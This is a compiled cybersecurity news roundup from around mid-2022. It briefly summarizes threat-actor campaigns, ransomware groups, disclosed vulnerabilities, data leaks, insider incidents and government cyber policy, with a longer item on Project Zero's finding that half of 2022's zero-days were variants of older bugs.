Security firm Sygnia has published a report on Luna Moth, a new threat actor that, since March this year, has been engaging in hack-and-extortion attacks. Sygnia said Luna Moth uses spear-phishing to infect victims with a remote access trojan, which it then uses to steal sensitive data that can be used in a future extortion attempt. The company reported that some extortion demands reached “millions of dollars.”

XFiles campaign

Threat intelligence company CyberInt said in a report on Sunday that it detected a malware distribution campaign spreading the XFiles infostealer trojan with documents weaponized with the Follina Office zero-day.

Chropex campaign

Broadcom’s Symantec team said it detected a rise in attacks distributing Chropex, a browser hijacker targeting macOS platforms that can monitor Safari searches and insert ads in web pages. Symantec said the Choprex group typically uses malvertising campaigns and drive-by downloads to distribute their payload.

New RedAlert ransomware

Security researchers also discovered a new ransomware operation this week. Named RedAlert, according to BleepingComputer, this group has tools that can encrypt Windows and Linux-based VMWare SXi servers alike.

Hive ransomware

Microsoft has published a technical analysis of the Hive gang’s new Rust-based ransomware strain, which the group has been using in attacks since March this year.

VSingle

Japan’s CERT team has published a report on new versions of VSingle, a malware strain used by North Korean state-sponsored hackers, targeting both Windows and Linux users. This new report focuses on the updates to the Linux version, which has been updated to include a backup mechanism for obtaining command-and-control server information from GitHub repositories.

Bitter APT

Researchers from German security firm SECUINFRA have published a report on a campaign carried out by the Bitter APT against targets in Bangladesh. The campaign’s end goal was to infect victims with the Almond RAT.

Brute Ratel abuse

Palo Alto Networks said it identified a suspected APT29 campaign that abused Brute Ratel, an adversary emulation framework developed by a former Crowdstrike and Mandiant security engineer. The Brute Ratel author said they took actions against the licenses abused in these attacks, which they claim were sold on the black market.

https://twitter.com/NinjaParanoid/status/1544334653976641536

Konni targets Russia

Limen’s Black Lotus Labs have published a report on a recent spear-phishing campaign targeting Russian targets that they linked to Konni, a North Korea-based espionage group. The group previously targeted Russian government agencies earlier this year.

Windows Kerberos bug

James Forshaw of Google’s Project Zero has published a technical analysis about a vulnerability that allows remote code execution (CVE-2022-24545) and elevation of privilege (CVE-2022-30165) in the Windows Kerberos service. The vulnerability can be exploited in unpatched systems via CredSSP, a Windows protocol designed to securely forward authentication credentials between a client and a remote server in an internal network/domain.

OpenSSL bug

The OpenSSL project released a security update on Tuesday to fix several security flaws, including a vulnerability that, under certain scenarios, can lead to remote code execution on a small subset of OpenSSL servers.

EternalBlue, five years later

Five years after the WannaCry and NotPetya ransomware outbreaks, Jan Kopriva of ISC SANS says that the number of internet-connected systems vulnerable to the EternalBlue exploit has decreased by more than two-thirds.

EternalBlue, five years later

The FBI Says People Are Applying to Jobs Using Deepfakes

We’ve heard of people hiring contractors to do their jobs for them, but now people are using AI to get the job in the first place. The specific technique being used was applying a skin during a video interview to look like someone else, and using voice spoofing software to make it sound different as well. A number of these were caught when the avatar’s mouth didn’t match the sound. I expect this is somewhat easy to catch right now, but that it’ll get much more difficult in just a year or two. Read more: FBI Says People Are Using Deepfakes to Apply to Remote Jobs

Data For 1 Billion Chinese Citizens Being Sold Online

An anonymous hacker appears to be selling a massive Chinese police database of over 1 billion people. Released sample data includes names, phone numbers, national ID numbers, and birth information. Other sample data included crimes people have been charged with, such as: looting, fraud, and handjobs. The dump is evidently 23 terabytes in total, and is being sold by a user named ChinaDan for around $200,000 (10 bitcoin). Read more: A Massive Police Database of Allegedly 1 Billion Chinese Citizens Is Being Sold Online

China Targeting Rare-Earth Companies with Influence Operations

Mandiant has found evidence of Chinese attackers running influence operations against companies competing with China in the rare-earth elements space. They’re launching influence campaigns to anger local residents and presumably harm their business and marketshare. Read more: Chinese Influence Op Tries to Undermine Western Rare Earth Firms

HackerOne Employee Fired for Stealing Bounties

A HackerOne employee has been fired for going through customers’ bounty submissions and submitting them as his own to earn money. This is pretty much the nightmare scenario for a company that’s based on trust, but it looks like they handled it as best as possible. Read more: HackerOne insider fired for trying to claim other people’s bounties

Indian Hacker Groups As a Service

Indian hacking groups are being used to target the law firms representing their clients’ opposition, essentially attempting to dig up dirt that can be used to discredit them in court. They also go after targets directly for the same purpose: finding dirt. It’s like a high-end call center service, but for finding leverage against people by hacking them. Obviously doing bad things is bad, but I think it’s an interesting business model. And the article is very in-depth. Read more: How mercenary hackers sway litigation battles

HackerOne discloses malicious insider incident, and nobody’s surprised

Three years ago, a Romanian vulnerability researcher accused employees of the HackerOne bug bounty platform of accessing bug reports he filed on the platform, taking his findings, and using them to file similar reports at other companies on the same platform—effectively stealing future profits.

At the time, the researcher did not provide any proof for his accusations, but once he went public, other researchers told similar tales. Nobody posted any proof, but everyone was telling the same story—of how HackerOne moderators would often mark and close a report as “informative,” claiming a vulnerability had no significant impact on a company, but once the researchers tried to submit the same “unique” bug against other HackerOne programs, their reports would be marked as “duplicates,” suggesting someone else had already filed a similar report before them.

Although no evidence that HackerOne employees were stealing bug reports for their own profits was ever posted, the rumors persisted throughout the years, mainly because everyone likes a good conspiracy theory.

But it’s not a theory anymore. In a report published late Friday, just ahead of the July 4th extended weekend, and hoping the incident would not get extended media coverage, HackerOne disclosed the first incident of a rogue employee stealing a researcher’s bug report.

Recounting the events following an internal investigation, HackerOne said that, on June 22, one of the companies that runs a bug bounty program on its platform complained that they received a vulnerability report through a separate channel that was similar to a bug submitted via its HackerOne program.

HackerOne’s customer said they took note of the report because the person who submitted this bug used “intimidating language,” in what’s most likely coded language and lawyer-speak for a suspected extortion attempt.

When HackerOne tried to dismiss the customer’s complaint with the classic excuse that “bug collissions and duplicates” can happen in the infosec industry, the customer “expressed skepticism that this was a genuine collision and provided detailed reasoning.”

To HackerOne’s credit, once the company was convinced of the customer’s valid complaint, it took less than a day to identify the rogue employee, block his access to HackerOne systems, and remotely lock their laptop.

HackerOne also said it reviewed the employee’s entire activity log from their two and a half months of employment and linked his identity to a second HackerOne account, which was used to collect bounty payments for bug reports the employee stole from other researchers.

The employee was fired on Thursday, and HackerOne said it has not decided if it would refer the case to law enforcement just yet.

In total, HackerOne said their former employee received payments from seven other companies, but this number could be larger, and asked companies to come forward if they received any communications from a researcher named “rzlr,” their former employee’s secondary sock-puppet account name.

Ransom payment back for a profit

The Maastricht University in the Netherlands will receive the ransomware payment they paid to hackers in 2019 back and with a profit. The university paid €200,000 in Bitcoin to the hacker three years ago, and they will receive their Bitcoin back after Dutch authorities tracked down the payment to a money launderer in Ukraine, who was detained last year. The positive side is that the Bitcoin is now worth €500,000, which the university said it plans to put in a fund meant to help struggling students, according to Dutch newspaper de Volkskrant [non-paywalled version in NOS].

Sharp Boys leak

An Iranian hacking group named Sharp Boys has leaked the personal information of more than 300,000 Israeli citizens who signed up on travel agency websites. Leaked data includes ID numbers, addresses, and even payment card details. According to the Jerusalem Post, data from more than 20 websites was leaked, including hotel4u.co.il, hotels.co.il, isrotel.com, minihotel.co.il, trivago.co.il, and danhotels.com. According to the Times of Israel, all websites were operated by a company named Gol Tours LTD, and Israeli officials took a never-before-seen step of seizing all the company’s servers to have better access and investigate the intrusion.

DTEK hack

Ukrainian officials said that Russian hackers and their military forces appear to have coordinated once again this past week. Victor Zhora, head of Ukraine’s SSSCIP security agency, said that Russian hackers hit the network of Ukrainian power grid DTEK at the same time that Russian missiles hit the company’s thermal power plant in Kryvyi Rih. DTEK has also formally confirmed the incident in a statement. On Russia’s side, the DTEK hack was claimed by XakNet, a pro-Russian hacktivist group that many security experts say operates on the instructions of Russian intelligence services.

DTEK hack

DNS hijack incident

Ankr, a company that provides server infrastructure for blockchain companies, disclosed a security breach on Friday, revealing that a threat actor social-engineered a Gandi employee to take control over some of its servers. The company said the attacker modified two nameservers in order to redirect traffic from two RPC servers to malicious versions. These two servers handled traffic for Polygon and the Fantom Foundation, two organizations that specialize in Ethereum-based infrastructure. Both companies confirmed the RPC infrastructure hijack but did not provide any details about the impact on their customers.

China to invest in its own OS

A group of ten Chinese tech companies have agreed to help Kylinsoft build a new project named openKylin, meant to help improve the open-source development of Kylin, China’s national operating system. The move comes as western software companies, such as Microsoft and Apple, are pulling out of Russia and creating technical issues for the Russian government, which, just like China, is incredibly dependent on US-made operating systems.

Azure AD now supports temporary passcodes

Microsoft has formally launched a new feature called Temporary Access Pass for Azure AD. The feature allows Azure AD servers to issue time-limited passcodes to a company’s employees. These passcodes can be used by employees to register new accounts or reset accounts where they lost access. Microsoft said the feature should be used by companies that have migrated their employees to passwordless setups where employees use hardware security keys, authenticator apps, or biometrics to access their accounts and need a temporary way to let users register or reset access to accounts.

IT Army revelations

Stefan Soesanto, a cyber defense researcher from Switzerland and an expert in the activities of the IT Army of Ukraine [his PDF report here] said on Friday that ITAU members have admitted for the first time that they used a DDoS campaign against one of their targets as a distraction for a data exfiltration operation. The target was Russia’s e-procurement resource platform Roseltorg.

New pro-Russian hacktivist group

A new pro-Russian hacktivist group calling itself DeaDNet has taken credit for the wave of DDoS attacks that have hit Norway over the past week. The group now joins the ranks of similar hacktivist groups like KillNet and XakNet, although it’s unclear if they are just a front for Russian intelligence services, like the previous two.

New YDIO group

The former DarkLulz hacking group has rebranded as Your Data Is Ours (YDIO) and announced a series of coordinated attacks against companies located in BRICS countries (Brazil, Russia, India, China, and South Africa).

LockBit and Darkside connection

Emsisoft CTO Fabian Wosar says that large chunks of the LockBit 3.0 source code appear to have been copied from the now-defunct ransomware strains Darkside and BlackMatter.

One of the theories why we’re seeing this older code re-used in LockBit 3.0 is below:

Dark web trends shifts

After authorities seized several dark web marketplaces earlier this year, activity on carding marketplaces and underground forums saw a spike, according to a joint report from Agari and PhishLabs.

Raspberry Robin continues to spread

Microsoft told customers in a security alert last week to bolster their defenses against the Raspberry Robin malware, as the company has found infections with this new threat on the networks of hundreds of customers. Discovered by Red Canary last year, Raspberry Robin is a Windows worm that spreads through USB devices and often uses hacked QNAP NAS devices as command-and-control servers.

SolidBit and CryptOn

Researchers from the S2W Talon team have spotted two cybercrime groups using branding similar LockBit, a well-known and successful ransomware operation. The first is named SolidBit, and while its code appears to be based on the Yashma ransomware, its logo and payment site mimick LockBit’s style. The second is named CryptOn, and while it has not been confirmed to be an actual ransomware operation, its leak site is almost identical to the one used by LockBit.

Bind9 vulnerabilities

An internet scan carried out by researchers from security firm SpiderSilk found that more than 315,000 DNS servers are vulnerable to a vulnerability in the BIND9 DNS server software tracked as CVE-2021-25220. Disclosed earlier this year in March, the vulnerability can be used to poison the cache of DNS servers and propagate bad DNS responses across its clients.

DFSCoerce micro-patches

Security firm ACROS has released a micro-patch for the DFSCoerce vulnerability, which Microsoft said it wouldn’t fix. Mitja Kolsek, co-founder and CEO of ACROS Security, told Risky Biz News that his company now has micro-patches for all four major NTLM relay attacks disclosed over the past year that Microsoft classified as “won’t-fix” issues. This includes RemotePotato0, PetitPotam, PrinterBug/SpoolSample, and DFSCoerce.

Half of 2022’s zero-days are variants of older vulnerabilities

If you lurk around enough security people and if you read enough infosec write-ups, at one point or another, you are going to run across the phrase “make 0-day hard.

If that sounds familiar, it’s because the phrase is the unofficial motto of Project Zero, which is Google’s most (in)famous security team, tasked with finding, tracking, and studying software vulnerabilities.

While Project Zero researchers have a broad range of responsibilities, one of their initial undertakings was to track the use of zero-days (previously unknown software vulnerabilities) in attacks that take place in the real world, studying their root cause, and then trying to spot if certain attacks can be prevented by working with vendors on fixing a particular bug class.

Since 2019, this job has primarily fallen under the task of Maddie Stone, a San Francisco-based security engineer who joined Project Zero from Android’s security team. Her name is on most root cause analysis (RCA) reports published by the P0 team over the past few years, and you’ll regularly find Stone presenting her and Project Zero’s work at security conferences every few months.

Stone and Project Zero’s work on putting together highly-detailed RCA reports have greatly contributed to making vendors and other security researchers aware of the fact that, in many cases, software vendors take the easy way out and release patches that address a particular attacker’s exploit code, but do not fix the underlying issue in the software’s code and how the software was designed to work.

This has led to situations where threat actors study the vendor’s patch, find a new way to exploit the underlying issue, and launch new attacks with a new variant of the same zero-day.

While Stone slightly touched on this issue in the past, in a report published in April that analyzed the zero-days deployed in the wild throughout 2021 and in another report about the zero-days exploited in 2020, she now has new numbers to paint a new picture of this old problem.

In a new report published on Thursday, Stone said that 9 of the 18 zero-day vulnerabilities that were detected being used in the wild in the first half of 2022 have been variants of older vulnerabilities.

“At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests,” Stone said.

“On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.”

Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.

Stone argues that vendors should do more root cause analysis of their own. First, because it helps the security industry; second, because it helps the company’s own developers too; but third, and most important, because it makes an attacker’s job harder and may delay future attacks.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.

OpenSea malicious insider

OpenSea, today’s largest NFT marketplace, has suffered a malicious insider incident. The company said that an employee of Customer.io, its email delivery vendor, misused their access to download the email addresses of OpenSea users who signed up for the marketplace’s newsletter.

Walmart denies ransomware attack

US retail giant Walmart has denied getting hit by a ransomware attack. The company’s name had been recently listed on the leak site of the Yanluowang ransomware gang, with the group claiming to have encrypted between 40,000 and 50,000 of the retailer’s systems.

Harmony hack linked to North Korea

Experts from blockchain tracking company Elliptic have linked the $100 million hack of the Harmony inter-blockchain bridge to North Korean state-sponsored hackers. The finding is terrible news for the platform’s customers, as it is now highly unlikely that the attackers would return any of the stolen funds. According to blockchain security firm PeckShield, the attackers have already laundered roughly $36 million of the stolen funds already. In the meantime, Harmony has increased its bounty on any information on the attackers from $1 million to $10 million, a sum they are also willing to offer to the attackers to return the stolen funds. Fat chance, though!

DDoS attacks hit Norway

The Norwegian National Security Authority blamed a series of large DDoS attacks against Norwegian companies on Tuesday on “a pro-Russian criminal group.”

Geographic Solutions incident

A cyberattack has disrupted the activities of Geographic Solutions, a Florida-based company that provides unemployment claims and job placement for several US state governments. NBC News reports that the incident has impacted the services provided by departments of labor and related agencies in at least nine states, as well as the DC area.

Macmillan ransomware incident

Macmillan, one of the Big Five publishers of English language content, has been hit by ransomware, according to a report from Publishers Weekly. The incident appears to have taken place over the weekend, and the company said that some systems might be affected while they work to restore systems.

Google goes after YouTube scams

Google said on Thursday that it plans to remove the option for YouTube channel owners to hide their subscriber counts as a measure to fight spam on the platform. The measure is meant to fight a recent trend where threat actors are creating accounts mimicking legitimate ones and running various scams to defraud users. The idea is to show subscriber numbers at all times, which would allow regular users to differentiate between a legitimately popular account and a scammy one with almost no followers. [Read the full report in TechCrunch]

Chrome Password Manager updates

Google has rolled out a series of updates to the Chrome Password Manager. New features include grouping passwords for the same sites and apps together, the possibility of adding a home screen shortcut for the password manager utility, the ability to easily fix weak or compromised passwords, the possibility to manually add passwords to the manager, and a unified user interface across all platforms.

Coordinated action against Google

Ten consumer groups, under the coordination of the European Consumer Organisation (BEUC), have filed complaints with data protection agencies in their countries against Google for using misleading language and design choices that funnel users towards its “surveillance systems.” BEUC said complaints had been filed in France, the Czech Republic, Norway, Greece, and Slovenia.

Israel warned US about power grid attacks

The Commander of Israel’s vaunted IDF Unit 8200, the country’s SIGINT agency, told Israeli media this week that his team warned the US of attempts from Iranian hackers to attack US power plants. Col. U., as he is identified, said they discovered the plot while investigating attacks on its water facilities last year.

RCMP admits to using spyware

Officials from Canada’s Royal Canadian Mounted Police admitted for the first time that they used spyware in past investigations. The tools were used by the RCMP’s CAIT (Covert Access and Intercept Team) in 10 past operations, dating as far back as 2018, according to a document shared by the agency with the Canadian Parliament last week. Officials said they resorted to intrusive spyware because targets switched to encrypted communication channels and wiretaps became ineffective.

NATO to create cyber rapid response force

At the recent NATO members conference in Madrid, Spain, the Alliance announced plans to create a rapid response cyber force team so members can respond faster to “significant malicious cyber activities.” [Additional coverage in Cyberscoop]

UK removes Chinese-made cameras

The UK Department of Work and Pensions has banned the use and purchase of Chinese-made security cameras. Current cameras will be replaced over the next three years. The UK DWP now becomes the second UK government agency to ban Chinese-made cameras after the UK Department of Health and Social Care, according to the SCMP.

Uber CISO case

A US judge expanded the legal case against Joseph Sullivan, the former Uber CISO, to also include wire fraud charges over his alleged role in trying to cover up a 2016 hacking that exposed the personal information of 57 million passengers and drivers, Reuters reported.

Ukraine phishing gang arrest

Ukraine’s Cyber Police detained this week nine suspects that were part of a cybercrime group that ran more than 400 phishing sites. Most of the phishing sites mimicked EU websites offering financial assistance to Ukrainians. Officials said the gang stole an estimated 100 million hryvnias from their victims, worth around $3.4 million.

8220 gang

Microsoft has a Twitter thread on the recent activities of the 8220 Gang, a cryptocurrency-mining group active since early 2021. Microsoft says the group has been recently seen exploiting vulnerabilities like CVE-2022-26134 (Confluence) and CVE-2019-2725 (WebLogic) for initial access against Linux systems, confirming similar observations from Check Point earlier this month.

Threat actor unmasked

A Romanian security researcher has delved into the workings of a recent phishing campaign mimicking the Romanian ANAF (National Agency for Fiscal Administration) and linked it to a threat actor based in Brazil.

Hacker-for-hire scene, international outlook

Google’s TAG team has published an overview of the hacker-for-hire scenes in India (Appin and Belltrox), Russia (Void Balaur), and UAE. According to Google, the UAE group is particularly interesting because they are linked to the original developers of H-Worm, a malware strain also known as njRAT, and some of their campaigns have been documented as far back as 2018. As part of its report, Google also added more than 30 domains used by these companies to its Safe Browsing API, so users receiving emails or navigating to the sites will now receive security alerts.

Hacker-for-hire scene, Indian scene

Reuters investigative reporters Raphael Satter and Christopher Bing have published an in-depth piece on the activities of several India-based hacker-for-hire companies—such as Appin, BellTroX, and CyberRoot—that have breached lawyers & litigants on behalf of Western private eye firms.

YTStealer

Intezer’s Joakim Kennedy took a deep dive into YTStealer, a new infostealer that has been specifically designed to steal YouTube account authentication cookies and has been used solely in targeted attacks against YouTube account owners. One of the malware’s most innovative features is that YTStealer also navigates to a YouTube account owner’s Studio page, from where it grabs information about the user’s channels, such as channel name, how many subscribers it has, how old the channel is, if it is monetized, an official artist channel, and if the name has been verified.

MedusaLocker

CISA, the FBI, FinCEN, and the US Treasury have released a security advisory on the MedusaLocker ransomware. The agencies said the ransomware gang behind MedusaLocker has been active as recently as May 2022, and the gang has heavily relied on vulnerabilities in the Windows RDP service for initial access to victims’ networks.

SessionManager IIS backdoor

Security researchers from Kaspersky have discovered a new IIS backdoor trojan that they named SessionManager. Researchers said SessionManager has been used against NGOs, government, military, and industrial organizations in Africa, South America, Asia, Europe, Russia, and the Middle East, starting from at least March 2021. Kaspersky said the malware appears to be a variant of the older OwlProxy backdoor and is most likely the work of the Gelsemium threat actor.

Toll fraud malware

Microsoft has a report out on what it calls “toll fraud malware,” also known as WAP billing or premium number schemes.

New stealer detected

Broadcom’s security team said it discovered a new infostealer named RecordStealer being used in the wild. An AhnLab report also has some details about this new malware strain.

Black Basta

A Trend Micro report details new tactics employed by Black Basta affiliates, who are now using the QakBot trojan for initial access into corporate networks and the PrintNightmare to expand their access.

FluBot trojan

Fox-IT researchers have published a technical report on the history and evolution of the FluBot Android banking trojan, a botnet that has been recently seized with the help of Europol. The researchers found that FluBot heavily relied on servers located in the Netherlands and that they do not rule out a FluBot comeback if they move future infrastructure to “safer” hosting companies.

FluBot trojan

Cryptocurrency crash

Blockchain tracking companies like Chainalysis and TRM Labs have told Reuters that the recent and sudden crash in cryptocurrency values has wiped out tens of millions from North Korea’s caches of stolen cryptocurrency. For example, a North Korean cache of stolen funds lost about 80-85% of its value from last year and is now worth less than $10 million.

Chinese espionage

A Financial Times investigation found that members of the APT40 cyber-espionage group have lured Chinese students who spoke good English into working as translators for a front company that secretly and unbeknownst to them had them translate hacked documents or material needed for target reconnaissance. The FT said APT40 employed more than 140 students in this scheme, which operated out of the island of Hainan, where the Department of Justice and Intrusion Truth previously linked APT40’s base of operation.

XSS bug can steak your browser credentials

Researchers from GoSecure have found that the autofill feature in browsers like Chrome, Edge, Firefox, Opera, and Internet Explorer can be abused to steal user credentials from certain sites; if the same sites are also vulnerable to some sort of cross-site scripting (XSS) bugs.

Zoho ManageEngine vulnerability report

Horizon3 researchers have published a report on CVE-2022-28219, an unauthenticated remote code execution vulnerability affecting Zoho ManageEngine ADAudit Plus, a compliance tool used by enterprises to monitor changes to Active Directory. The vulnerability allows attackers to take over ManageEngine systems and then the local network by compromising domain admin accounts.

Unrar vulnerability in Zimbra:

SonarSource researchers have discovered a vulnerability in the Unrar tool, part of the Zimbra CMS, which could be exploited to take over Zimbra instances.

Jenkins plugin vulnerabilities

The Jenkins project has published a security advisory warning about vulnerabilities in 25 plugins.

Call stack spoofing

F-Secure’s William Burgess has published a technical write-up on a technique named call stack spoofing that can be used to confuse EDR products and hide malicious operations.

New tool

eCrimeLabs has released and open-sourced a new tool called the MISP Purge Events tool. The name is self-explanatory.

Cyber insurance state

After a series of costly cyber-attacks have led to a spike in cyber-insurance rates, insurance broker Marsh said in a report released this week that rates are now stabilized again. [More on The Record]

    Ads Blocker Image Powered by Code Help Pro

    Ads Blocker Detected!!!

    This site depends on revenue from ad impressions to survive. If you find this site valuable, please consider disabling your ad blocker.